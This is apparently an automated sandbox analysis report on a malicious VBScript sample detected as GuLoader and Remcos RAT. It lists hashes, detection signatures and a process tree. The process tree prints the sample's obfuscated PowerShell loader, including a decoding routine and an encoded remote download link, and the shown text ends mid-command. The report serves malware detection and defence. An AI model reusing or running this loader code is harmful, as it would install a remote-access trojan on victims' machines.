Edit tour
Windows
Analysis Report
AF85714759_htm#U00b7pdf.vbs
Overview
General Information
| Sample name: | AF85714759_htm#U00b7pdf.vbsrenamed because original name is a hash value |
| Original sample name: | AF85714759_htmpdf.vbs |
| Analysis ID: | 1466654 |
| MD5: | e31a921fa7bbdb8a49fec66db0fed99e |
| SHA1: | f43505f1553c845626c6a1a4284277c6ac32679c |
| SHA256: | d991c4cf68d0fa2019a6fb61bb5197a33512372076fac18e6867e598612e8c73 |
| Tags: | vbs |
| Infos: |   |
 | |
Detection
Remcos, GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 6928 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\AF857 14759_htm# U00b7pdf.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 4416 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "cls;write 'labeler Esmeralda Prepious E ngleskares Archaiser Dolphinfi shes150 Pu ngi Amar S jlesorger shopkeeper Nephrosto my Mainfra mes Ranina e Kobberbr ylluppet f irethorn S mlds outsl ander Prae dikaterne Ublufrdigs te Sejlklu bbers Amts skatteinsp ektoratet Nondecorat ion235 Top minnow Int ervenerede s labeler Esmeralda Prepious E ngleskares Archaiser Dolphinfi shes150 Pu ngi Amar S jlesorger shopkeeper Nephrosto my Mainfra mes Ranina e Kobberbr ylluppet f irethorn S mlds outsl ander Prae dikaterne Ublufrdigs te Sejlklu bbers Amts skatteinsp ektoratet Nondecorat ion235 Top minnow Int ervenerede s';If (${h ost}.Curre ntCulture) {$Almengj orde++;}Fu nction Spr ge($Kalkun ernes){$ba tterdock=$ Kalkunerne s.Length-$ Almengjord e;$Experie ntialistic ='SUBsTRI' ;$Experien tialistic+ ='ng';For( $Ricaboor acker=2;$R icaboorack er -lt $ba tterdock;$ Ricaboorac ker+=3){$l abeler+=$K alkunernes .$Experien tialistic. Invoke( $R icaboorack er, $Almen gjorde);}$ labeler;}f unction Dk vingen($Sm aaborgerli geres){ & ($Hektoli ters) ($Sm aaborgerli geres);}$O msorgsfuld ere=Sprge 'B,MSpoInz BaiAmlBal. ua,e/Gu5Mu .He0A .i(, eW ,iBlnIn dAroScwP s Sk EnN.rTF o 1Di0He. D.0Rn;Sp F iW AiLant 6 r4.e;Bo AdxSu6Gi4A d;Wi RhrAn vAs:Pl1He2 Tr1Mi..r0S u)al GeG L eSkcU.k Ao Na/C,2Pe0F a1Pr0.e0Ot 1An0Om1ag InFA,i Fr, ueLafSuoHe xb,/Ne1 D2 ,1 U. ,0B , ';$Theor ize=Sprge 'BiU,is .e StrAn-L A eg,reSunYa t H ';$Arc haiser=Spr ge 'HahFet .ut Dp ss C: A/Ta/ . dLar RiUdv PoeS,.DegR uoF,o og.y lKae K.Foc Mo,rmSj/R euPacNe?As e,oxTep.eo TrShtEr=S edSeoK.wVi nShlKyoUla Std,n& BiP edK.= M1 , -F.zTy0ral M_F 0E MP rGbuUTrlSo c COCy-Br5 TeKoO NlS Z.kq LtKn S LuLilSa5 Su.rzSng nPT.Xl pSi hSi_Li ';$ Pediococci 150=Sprge 'Br>P. ';$ Hektoliter s=Sprge 'P riHeeAyxUn ';$Koksed e='Amar';$ Doktordisp utatsen = Sprge ',ae MacRuhHao l ,a%B.a.h pHep .dK a DtM,aRe% a\S.FT.oA. lAekMieHes nlExaSeg ,eCrtD.. . O,up,di,y Co&Fo&Fu M ,e cDehT o Do Unts. ' ;Dkvingen (Sprge 'Ve $ ,gnelRuo FabSraPilC e:BeSett . asptA iC o Sn,lcBaaF .r .eDunl =S,( Bchom EfdEm De/ Nc , B$I,D efoKekA.tu roRerDidBr iKls Ap,au Catp,aGatA fs .e CnLe ) Z ');Dkv ingen (Spr ge ' ,$,eg Del.ao ,bI na ,lSa: M ES n Rgdal P eU s rkK a,ir TeKo s,a=Va$JuA .r .cFlh ,aUniSks l e nrUd. Ds ,pFaljuiS t .( M$Un P .eAndB,i o BcPyo.t c ScFoi P1 Sc5 T0 s)E k ');Dkvin gen (Sprge ' y[ NC e ,tPr. iSC aePar.rv.i i.ec .eIlP koo oi rnR atClM Ta.p nAcaVigSae RerCh],e:E k: ASPaeK. c Mu .r Pi EntHjy TPG ar AoIntQu oVic,uo Vl =In [ N ee ItPr. .SHoe bcC ou trMyi H tOmy.iPUdr SkoP.t oVa c o elArTK lyOpp HePr ],i:Ud:CoT N,lF sNo1 V2 K ');$A